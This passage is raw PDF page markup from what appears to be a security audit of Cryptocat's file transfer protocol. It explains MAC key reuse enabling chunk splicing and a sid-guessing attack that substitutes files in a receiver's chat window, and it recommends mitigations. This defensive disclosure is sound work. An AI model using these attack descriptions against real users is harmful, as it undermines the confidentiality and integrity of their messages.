62.69291 561.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.759213 Tw (A server compromise \(including malicious insiders\) could allow modification or live update of the) Tj T* 0 Tw (server code.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 531.0236 cm Q q 1 0 0 1 62.69291 507.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.24229 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed \(including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service\), an active ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against) Tj T* 0 Tw /F3 10 Tf (TLS ) Tj /F1 10 Tf (protected servers could be used to leverage this attack.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 501.0236 cm Q q 1 0 0 1 62.69291 489.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 489.0236 cm Q q 1 0 0 1 62.69291 447.0236 cm q BT 1 0 0 1 0 26 Tm 1.249983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by source code inspection. The experiments performed for Issue A) Tj T* 0 Tw 1.645318 Tw (also support the conclusion that ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys are reused between file transfers, provided that there has) Tj T* 0 Tw (been no key rollover.) Tj T* ET Q Q q 1 0 0 1 62.69291 417.0236 cm q BT 1 0 0 1 0 14 Tm .461984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (HMAC ) Tj /F1 10 Tf (with ) Tj /F3 10 Tf (SHA-256 ) Tj /F1 10 Tf (is used to protect the integrity of the file contents. 
Each) Tj T* 0 Tw (chunk of the file is transmitted with a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (computed on the following fields:) Tj T* ET Q Q q 1 0 0 1 62.69291 359.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 48 re B* Q q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F4 10 Tf 12 TL (the chunk number \(rcvFile[from][sid].ctr\)) Tj T* (the total number of chunks \(rcvFile[from][sid].total\)) Tj T* (the chunk contents) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 291.8236 cm q BT 1 0 0 1 0 50 Tm 1.289988 Tw 12 TL /F1 10 Tf 0 0 0 rg (Due to the key reuse vulnerability described in Issue A, it is possible for two files to be sent using the) Tj T* 0 Tw 1.745984 Tw (same ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key \(the encryption and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys are both derived from the ) Tj /F4 10 Tf (extra_symkey ) Tj /F1 10 Tf (created in) Tj T* 0 Tw .374692 Tw /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session initialization\). When this happens, a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag that is valid for a given chunk of one) Tj T* 0 Tw .566179 Tw (file, will also be valid for the same chunk of the other file, provided that the total number of chunks is the) Tj T* 0 Tw (same.) Tj T* ET Q Q q 1 0 0 1 62.69291 273.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (This allows chunks to be "spliced" between the files, violating the expected integrity guarantees.) Tj T* ET Q Q q 1 0 0 1 62.69291 231.8236 cm q BT 1 0 0 1 0 26 Tm 2.497318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The requirement that the files have the same number of chunks cannot be considered unlikely; for) Tj T* 0 Tw 1.123145 Tw (example, it is common for files to have length <) Tj (= 64511 bytes, and files that are revisions of the same) Tj T* 0 Tw (document are also likely to be similar in length.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 213.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The same comments on ) Tj /F3 10 Tf (DHSession ) Tj /F1 10 Tf (rotation as for Issue A apply to this issue.) Tj T* ET Q Q q 1 0 0 1 62.69291 213.8236 cm Q endstream endobj % 'R184': class PDFStream 184 0 obj % page stream << /Length 7900 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Mitigation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2013-11-06) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Live Mitigation: ) Tj /F1 10 Tf (We recommend these immediate mitigations to protect existing live users:) Tj T* ET Q Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 681.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.566235 Tw 12 TL /F1 10 Tf 0 0 0 rg (Notify users that file transfer may lose confidentiality and integrity, and that users with a low risk) Tj T* 0 Tw (tolerance should not transfer files using ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 675.0236 cm Q q 1 0 0 1 62.69291 639.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 2.08748 Tw 12 TL /F1 10 Tf 0 0 0 rg (Simultaneously, distribute a new stable release of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (, with version number 2.1.16, which) Tj T* 0 Tw 1.333318 Tw (disables the file transfer feature \(both send and receive\), and has no other changes compared to) Tj T* 0 Tw (2.1.15.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 639.0236 cm Q q 1 0 0 1 62.69291 609.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.943318 Tw (We recommend doing these steps right away instead of hurrying to publish an improved file transfer) Tj T* 0 Tw (feature, because:) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 102 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (It protects users, although admittedly it also inconveniences them.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 96 cm Q q 1 0 0 1 20 60 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.626905 Tw (It delays publishing details that attackers could use to exploit users. This potentially protects) Tj T* 0 Tw .454985 Tw (users more than if we simultaneously inform attackers of how to exploit users of the old version) Tj T* 0 Tw (at the same moment as announcing to users that they should stop relying on the old version.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 54 cm Q q 1 0 0 1 20 42 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Any other mitigation deserves careful analysis before implementation and deployment.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 20 36 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 2.859983 Tw (Future design and mitigation changes may benefit from other findings in this audit. If we) Tj T* 0 Tw .790814 Tw (immediately patch one problem, only to later discover another vulnerability with an unexpected) Tj T* 0 Tw (relationship to the patch, that effort may be thwarted.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 62.69291 483.0236 cm Q q 1 0 0 1 62.69291 453.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Remediation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 62.69291 435.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 405.0236 cm q BT 1 0 0 1 0 14 Tm 5.484524 Tw 12 TL /F2 10 Tf 0 0 0 rg (Design and Implementation Mitigation: ) Tj /F1 10 Tf (We recommend that after the ) Tj /F3 10 Tf (Live Mitigation ) Tj /F1 10 Tf (steps) Tj T* 0 Tw (recommended above, the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (team perform the following steps:) Tj T* ET Q Q q 1 0 0 1 62.69291 399.0236 cm Q q 1 0 0 1 62.69291 399.0236 cm Q q 1 0 0 1 62.69291 387.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Update the file transfer feature to be secure, for a future release of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 381.0236 cm Q q 1 0 0 1 62.69291 345.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .37498 Tw (Simultaneously with committing this patch to a publicly-readable source code repository \(i.e. github\),) Tj T* 0 Tw 1.963984 Tw (publish a document \(e.g. blog post\) describing the details of the vulnerability and how the fixed) Tj T* 0 Tw (version avoids it.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 345.0236 cm Q q 1 0 0 1 62.69291 327.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (We are willing to help design a future file transfer protocol, if desired.) Tj T* ET Q Q q 1 0 0 1 62.69291 300.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Versioning) Tj T* ET Q Q q 1 0 0 1 62.69291 222.0236 cm q BT 1 0 0 1 0 62 Tm 2.59528 Tw 12 TL /F1 10 Tf 0 0 0 rg (One valuable feature of a new file transfer protocol would be ) Tj /F3 10 Tf (versioning) Tj /F1 10 Tf (. Ideally, if one of the two) Tj T* 0 Tw .104987 Tw (endpoints is running code with the new file transfer protocol and the other is running code with file transfer) Tj T* 0 Tw 1.947633 Tw (disabled \(e.g. version 2.1.18\) or with the old file transfer protocol \(version ) Tj /F6 10 Tf 12 TL (\243) Tj /F1 10 Tf 12 TL ( 2.1.15\), users will get a) Tj T* 0 Tw .951235 Tw (graceful failure \227such as the file-transfer option being disabled in the UI along with an explanation that) Tj T* 0 Tw .621988 Tw (the other peer is using too old of a version\227 instead of an ungraceful failure such as silent failure, or an) Tj T* 0 Tw (error message that could frighten or confuse a user.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 168.0236 cm q BT 1 0 0 1 0 38 Tm .342927 Tw 12 TL /F1 10 Tf 0 0 0 rg (Similarly, it would protect users of older ) Tj /F3 10 Tf (Cryptocats ) Tj /F1 10 Tf (if their ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (client would not ) Tj /F3 10 Tf (attempt ) Tj /F1 10 Tf (to send files) Tj T* 0 Tw 2.464104 Tw (to a newer ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (, because doing so could expose the contents of their files even if the newer) Tj T* 0 Tw .569985 Tw /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (will not accept the transfer, so the new protocol could be designed to prevent older ) Tj /F3 10 Tf (Cryptocats) Tj T* 0 Tw /F1 10 Tf (from attempting to send to it.) Tj T* ET Q Q q 1 0 0 1 62.69291 138.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .076098 Tw (We do not currently have a specific protocol in mind to accomplish such versioning, but would be willing to) Tj T* 0 Tw (help try to design one.) Tj T* ET Q Q endstream endobj % 'R185': class PDFStream 185 0 obj % page stream << /Length 4230 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Generate per-file keys) Tj T* ET Q Q q 1 0 0 1 62.69291 708.0236 cm q BT 1 0 0 1 0 26 Tm 2.280651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol provides a secure shared symmetric key \(called the \223extra symmetric key\224 in the) Tj T* 0 Tw .143988 Tw /F4 10 Tf (otr.js ) Tj /F1 10 Tf (source code\), but if ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (is going to send ) Tj /F3 10 Tf (multiple ) Tj /F1 10 Tf (files, it can't just use that key, but needs a) Tj T* 0 Tw (unique key or ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (for each file.) Tj T* ET Q Q q 1 0 0 1 62.69291 678.0236 cm q BT 1 0 0 1 0 14 Tm .189461 Tw 12 TL /F1 10 Tf 0 0 0 rg (One way to accomplish that would be to use a Key Derivation Function \() Tj /F3 10 Tf (KDF) Tj /F1 10 Tf (\). A ) Tj /F3 10 Tf (KDF ) Tj /F1 10 Tf (\(e.g. 
) Tj 0 0 .501961 rg (HKDF) Tj 0 0 0 rg (\) can be) Tj T* 0 Tw (used as a function that takes two arguments\227secret key and diversifier\227and returns a new secret key.) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm q BT 1 0 0 1 0 38 Tm .482485 Tw 12 TL /F3 10 Tf 0 0 0 rg (Cryptocat ) Tj /F1 10 Tf (could use the "file identifier" \(typically called the "filename" in the source code and protocol\) as) Tj T* 0 Tw .451567 Tw (the diversifier. So, let current encryption key \227the one stored at index 0 in the ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (object in the ) Tj /F4 10 Tf (files) Tj T* 0 Tw 1.179983 Tw /F1 10 Tf (hashtable in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (\227 be called the "master encryption key", and let the current ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key) Tj T* 0 Tw (\227the one stored at index 1 in the ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (object\227 be called the "master ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key". Then:) Tj T* ET Q Q q 1 0 0 1 62.69291 578.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 36 re B* Q q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F4 10 Tf 12 TL (file Enc key = KDF\(key=master Enc key, diversifier=file identifier\)) Tj T* (file MAC key = KDF\(key=master MAC key, diversifier=file identifier\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 546.8236 cm q BT 1 0 0 1 0 14 Tm .274692 Tw 12 TL /F1 10 Tf 0 0 0 rg (Then, the rest of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (v2.1.15 file transfer protocol could be used as-is, but using the file-specific) Tj T* 0 Tw (Enc and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys instead of the master Enc and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys for encryption and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (respectively.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 480.8236 cm q BT 1 0 0 1 0 50 Tm 1.70832 Tw 12 TL /F1 10 Tf 0 0 0 rg (For this approach to be secure, the diversifier does not need to be confidential, but does need to be) Tj T* 0 Tw 1.157633 Tw (unique within the scope of a given master key. The file identifiers in the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (v2.1.15 protocol are) Tj T* 0 Tw .222485 Tw (random 128-bit values, so they can be relied on to have this uniqueness property. \(The master encryption) Tj T* 0 Tw .56832 Tw (key and master ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key, of course, need to be confidential, just as in the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (v2.1.15 file transfer) Tj T* 0 Tw (protocol.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 453.8236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (New standard file transfer protocol) Tj T* ET Q Q q 1 0 0 1 62.69291 399.8236 cm q BT 1 0 0 1 0 38 Tm 2.13881 Tw 12 TL /F1 10 Tf 0 0 0 rg (A longer term strategy is to promote and adopt a file transfer standard in the wider secure protocol) Tj T* 0 Tw .376412 Tw (community. We recognize that the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (team has already solicited feedback from this community on) Tj T* 0 Tw 1.16061 Tw (the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (development list, and we hope to advocate for more review and collaboration on this protocol) Tj T* 0 Tw (feature.) Tj T* ET Q Q q 1 0 0 1 62.69291 399.8236 cm Q endstream endobj % 'R186': class PDFStream 186 0 obj % page stream << /Length 8049 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 21 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue C. 
Substitution of File Contents By Hijacking Entry in User) Tj T* (Interface) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 14 Tm .370651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The file transfer feature uses a sender-supplied identifier to index into the receiver's display of) Tj T* 0 Tw (received files.) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm q BT 1 0 0 1 0 14 Tm 1.33881 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (The attack targets a file transfer from a "victim sender" to a "victim receiver". An attacker can) Tj T* 0 Tw (replace that file with another file when the victim receiver tries to download it.) Tj T* ET Q Q q 1 0 0 1 62.69291 597.0236 cm q BT 1 0 0 1 0 38 Tm 1.169983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (In order to succeed with high probability, this attack requires passive monitoring of) Tj T* 0 Tw .74561 Tw /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests \(or the ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic embedded in those ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests\), in order to) Tj T* 0 Tw .431163 Tw (find the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (of the targeted file transfer. The attacker, acting as another client in the same conversation,) Tj T* 0 Tw (must also send their replacement file to the victim receiver.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 579.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (Passive monitoring of the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic is feasible through several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 573.0236 cm Q q 1 0 0 1 62.69291 573.0236 cm Q q 1 0 0 1 62.69291 561.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A server compromise \(including malicious insiders\) could allow live traffic sniffing,) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 555.0236 cm Q q 1 0 0 1 62.69291 531.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.268443 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed \(including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service\), a ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against ) Tj /F3 10 Tf (TLS) Tj T* 0 Tw /F1 10 Tf (protected servers could be used to leverage this attack,) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 525.0236 cm Q q 1 0 0 1 62.69291 513.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 513.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .438221 Tw (An attacker can be assumed to know the conversation name, since that is available by the same passive) Tj T* 0 Tw (monitoring. 
Therefore, they are able to send their replacement file in the same conversation.) Tj T* ET Q Q q 1 0 0 1 62.69291 417.0236 cm q BT 1 0 0 1 0 50 Tm 1.577045 Tw 12 TL /F1 10 Tf 0 0 0 rg (The replacement file must be sent after the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (is known, and its transfer must complete before the) Tj T* 0 Tw .700574 Tw (targeted file transfer. This is straightforward if the replacement file is smaller than the targeted one or the) Tj T* 0 Tw .490651 Tw (attacker has higher bandwidth than the victim sender. Alternatively, since the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (increments by one for) Tj T* 0 Tw .398988 Tw (each unique ID used in a session, it can be guessed in advance of a file transfer, allowing the attacker to) Tj T* 0 Tw (start their transfer before the targeted one.) Tj T* ET Q Q q 1 0 0 1 62.69291 375.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .56881 Tw (The attack depends on the victim receiver having a one-to-one chat window to the victim sender open at) Tj T* 0 Tw 1.308221 Tw (the point when the attacker's file transfer completes. If the victim receiver is expecting to receive a file) Tj T* 0 Tw (from a given sender then it is quite likely they will have that buddy's window open.) Tj T* ET Q Q q 1 0 0 1 62.69291 333.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .322765 Tw (The victim receiver will also receive a notification that the attacker has sent a file. The attacker can cause) Tj T* 0 Tw .389461 Tw (the notification to disappear too quickly to be seen, by logging out the buddy used for the attack just after) Tj T* 0 Tw (the transfer completes.) Tj T* ET Q Q q 1 0 0 1 62.69291 279.0236 cm q BT 1 0 0 1 0 38 Tm 1.129983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by source code inspection and by experimentation. 
To simulate the) Tj T* 0 Tw .193984 Tw (attacker being able to eavesdrop the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (field, the experiments were performed using a modified version) Tj T* 0 Tw 8.74284 Tw (of ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (that forces the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (to zero for every file transfer, by changing the) Tj T* 0 Tw /F4 10 Tf (Strophe.Connection.getUniqueId ) Tj /F1 10 Tf (function.) Tj T* ET Q Q q 1 0 0 1 62.69291 177.0236 cm q BT 1 0 0 1 0 86 Tm 10.63198 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis: ) Tj /F1 10 Tf (The ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (identifying each file transfer is obtained from) Tj T* 0 Tw 4.308976 Tw /F4 10 Tf (Strophe.Connection.getUniqueId) Tj /F1 10 Tf (, which starts at a random integer between 0 and 99999) Tj T* 0 Tw .56832 Tw (inclusive, and increments by one on each call. \(Unique IDs are also used for other purposes that are not) Tj T* 0 Tw .371654 Tw (relevant to this issue.\) While a file transfer is in progress, the user interface element in the receiver's chat) Tj T* 0 Tw 1.174985 Tw (window with the sender has a ) Tj /F4 10 Tf (file= ) Tj /F1 10 Tf (attribute referencing the transfer's ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. This attribute is used by) Tj T* 0 Tw 1.013307 Tw /F4 10 Tf (Cryptocat.updateFileProgressBar ) Tj /F1 10 Tf (to update the progress bar, and by ) Tj /F4 10 Tf (Cryptocat.addFile ) Tj /F1 10 Tf (to) Tj T* 0 Tw 3.087633 Tw (replace the progress bar with a download link when the transfer is complete. 
\(It is also used by) Tj T* 0 Tw /F4 10 Tf (Cryptocat.fileTransferError ) Tj /F1 10 Tf (to signal an error.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 159.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The attack depends on the following code in ) Tj /F4 10 Tf (Cryptocat.addFile) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 125.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F4 10 Tf 12 TL ($\('[file=' + file + ']'\).replaceWith\(fileLink\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 93.82362 cm q BT 1 0 0 1 0 14 Tm .262651 Tw 12 TL /F1 10 Tf 0 0 0 rg (which performs a global replace of any currently displayed items having the specified ) Tj /F4 10 Tf (file=sid) Tj /F1 10 Tf (, with the) Tj T* 0 Tw /F3 10 Tf (HTML ) Tj /F1 10 Tf (of the new download link given by ) Tj /F4 10 Tf (fileLink ) Tj /F1 10 Tf (.) Tj T* ET Q Q endstream endobj % 'R187': class PDFStream 187 0 obj % page stream << /Length 3386 >> stream 1 0 0 1 0 0 cm 